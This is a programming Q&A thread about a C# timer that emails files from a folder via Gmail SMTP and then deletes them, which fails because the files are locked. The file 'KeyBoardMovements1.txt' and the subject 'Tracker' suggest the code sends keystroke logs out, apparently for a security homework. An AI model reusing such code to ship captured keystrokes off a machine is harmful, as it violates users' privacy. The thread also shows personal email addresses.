# Timer ends before completing sending Email

Tags: c#, exception, timer, sendmail

I have to send email in a timer body, in c# application, the timer interval is 2 seconds

```
try
{
    string[] filePaths = Directory.GetFiles(@"D:\ISS_Homewrok\");
    foreach (string filePath in filePaths)
    {
        SendEmail(filePath);
        File.Delete(filePath);
    }
}
catch (Exception ex)
{
    MessageBox.Show(ex.ToString());
}
```

This exception is thrown at deleting the file

```
    System.IO.IOException: The process cannot access the file 'D:\ISS_Homewrok\KeyBoardMovements1.txt' because it is being used by another process.
 at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.File.Delete(String path)
   at ISS_Homework.Form1.timer_tick(Object sender, ElapsedEventArgs e)
```

SendEmail method is:

```
private void SendEmail(string p)
    {
        SmtpClient smtp;
        //Detailed Method
        MailAddress mailfrom = new MailAddress("samahnizam@gmail.com");
        MailAddress mailto = new MailAddress("rubaabuoturab@gmail.com");
        MailMessage newmsg = new MailMessage(mailfrom, mailto);
        newmsg.Subject = "Tracker";
        //For File Attachment, more file can also be attached
        try
        {
            Attachment att = new Attachment(p);
            newmsg.Attachments.Add(att);
            smtp = new SmtpClient("smtp.gmail.com", 587);
            smtp.UseDefaultCredentials = false;
            smtp.Credentials = new NetworkCredential("XXXXX", "XXXXX");
            smtp.EnableSsl = true;
            smtp.Send(newmsg);
        }
        catch (Exception ex)
        {
        }
    }
```

**EDIT:**
I've made the interval of timer 1 minute and the exception is still being thrown !
Any help please.

Comment: Apparently another process, say a text editor or a service, is accessing the file you are trying to open. This is a typical scenario that you have to take into account when writing production quality code.

Comment: You spelt Homework wrong for one thing? Also, why do you want to send the email every 2 seconds?

Comment: You probably need to wait until the mail is actually sent before deleting the file. Is `SendMail` something you've written? If there's no "MailSent" event you can subscribe to you might have to introduce more of a delay.

Comment: @ChrisF yes, SendEmail is a method I have written to send an email. Is there a way to wait until email is sent?

Comment: smtpClient will block while transmitting the email. This is not the problem.

Answer (score 0):

You could try in your timer function

```
timer.Stop();
try
{
    string[] filePaths = Directory.GetFiles(@"D:\ISS_Homewrok\");
    foreach (string filePath in filePaths)
    {
        SendEmail(filePath);
        File.Delete(filePath);
    }
}
catch (Exception ex)
{
    MessageBox.Show(ex.ToString());
}
timer.Start();
```

Comment: I think it might work, but the problem when I arrive the (File.Delete(filePath)) I get the exception, I think I need someway to dispose the file.

Answer (score 0):

I would guess you are trying to send an new mail while your old request is being processed. When both provcesses try to acess an file, it will crash.
Solution:
Wrap your function in a backgroundworker.dowork procedure. Every time your timer fires, it can check the backgroundworker.isbusy method to check if the old process has completed. If not, simply wait antoher two seconds.

No code because I program in Vb.net

Comment: Can you please help me with some code, I'm familiar with VB.net too.

Answer (score 0):

What kind of timer are you using?  There are four different types of Timer in the .Net framework, and some of them spawn new threads to handle the Elapsed/Tick events.

In this case, I suspect that it is taking longer to send all of the emails than the interval between timer ticks.  If you are using one of the threading timers, then your file is being read by multiple timer threads at the same time.  See the documentation at [MSDN](http://msdn.microsoft.com/en-us/library/system.timers.timer.stop.aspx):

> The signal to raise the Elapsed event is always queued for execution
>   on a ThreadPool thread, so the event-handling method might run on one
>   thread at the same time that a call to the Stop method runs on another
>   thread. This might result in the Elapsed event being raised after the
>   Stop method is called. The code example in the next section shows one
>   way to work around this race condition.

What I would do is set a flag at the beginning of your routine to indicate that the process is currently running and to exit if that is the case:

```
if (_isRunning)
    return;

try
{
    _isRunning = true;
    string[] filePaths = Directory.GetFiles(@"D:\ISS_Homewrok\");
    foreach (string filePath in filePaths)
    {
        SendEmail(filePath);
        File.Delete(filePath);
    }
}
catch (Exception ex)
{
    MessageBox.Show(ex.ToString());
}
finally
{  _isRunning = false; }
```

Comment: I'm using System.Timers.Timer. And I've tried your code, but it didn't work, I still have the same exception.

Comment: Well, you are using the multithreading timer.  Could you please show me how you implemented my code?  I don't know what you might have before or after it.

Comment: Also, try putting in a Thread.Sleep(500) before the File.Delete method.  Just a thought, but something I would try before giving up.

Comment: I couldn't post the whole method because the limit of number of characters. But I wrote exactly the same code. :(
I think the timer fires again and sending email not finished yet.